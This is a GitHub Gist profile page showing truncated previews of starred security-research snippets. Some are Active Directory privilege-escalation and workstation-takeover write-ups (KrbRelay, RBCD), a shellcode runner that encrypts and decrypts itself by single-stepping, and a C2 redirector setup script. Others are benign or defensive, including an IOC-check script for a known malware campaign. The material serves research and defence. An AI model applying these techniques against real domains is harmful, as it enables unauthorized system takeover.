Skip to content

Instantly share code, notes, and snippets.

View ihack4falafel's full-sized avatar

Hashim Jawad ihack4falafel

347 followers · 0 following
View GitHub Profile
@NyaMisty
NyaMisty / outline_graph.py
Created September 1, 2022 01:02
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@tothi
tothi / krbrelay_privesc_howto.md
Last active August 24, 2024 03:19
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@ioncodes
ioncodes / Vagrantfile
Last active March 19, 2022 20:44
Spinning up Vagrant boxes for driver
Vagrant.configure("2") do |config|
config.vm.guest = :windows # tell Vagrant this is a Windows-based guest
config.vm.communicator = "winrm" # use winrm for management instead of ssh
config.vm.provider 'vmware_workstation' do |p|
p.linked_clone = false
end
config.vm.provider :vmware_desktop do |p|
p.vmx["ethernet0.pcislotnumber"] = "160"
end
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active September 6, 2024 13:56
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@mhaskar
mhaskar / Automated-Redirectors.py
Last active February 17, 2024 16:48
Python script to create HTTPS redirectors that pointing to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
@barbietunnie
barbietunnie / download-old-chrome-versions.md
Last active September 9, 2024 23:19
How to download old versions of Chrome

How to download old versions of Chrome

Click here to download old versions of Chrome for Linux, Mac and Windows.

The download_url field of the desired section houses the URL to the download.

Alternatively, for not too old versions, you can get it directly here.

@mpgn
mpgn / ioc_check.ps1
Last active March 5, 2021 18:13
# https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# https://twitter.com/richinseattle/status/1354296177743679489
# if true on powershell command or no error on reg query output you are infected !
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
[System.IO.File]::Exists('C:\Windows\System32\Nwsapagent.sys')
[System.IO.File]::Exists('C:\Windows\System32\helpsvc.sys')
@uf0o
uf0o / beep.cpp
Last active January 21, 2021 02:27
Usage of 'NtOpenFile' to access a device driver that doesn't export any symlink
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
#define IOCTL_BEEP CTL_CODE(FILE_DEVICE_BEEP, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
typedef struct _BEEP_SETTINGS {
ULONG ulFrequency;
@wumb0
wumb0 / PatchExtract.ps1
Last active September 18, 2024 03:05
extract microsoft MSU files
<#
____ _ _
| _ \ __ _| |_ ___| |__
| |_) / _` | __/ __| '_ \
| __/ (_| | || (__| | | |
|_| \__,_|\__\___|_| |_|
_____ _ _
| ____|_ _| |_ _ __ __ _ ___| |_
| _| \ \/ / __| '__/ _` |/ __| __|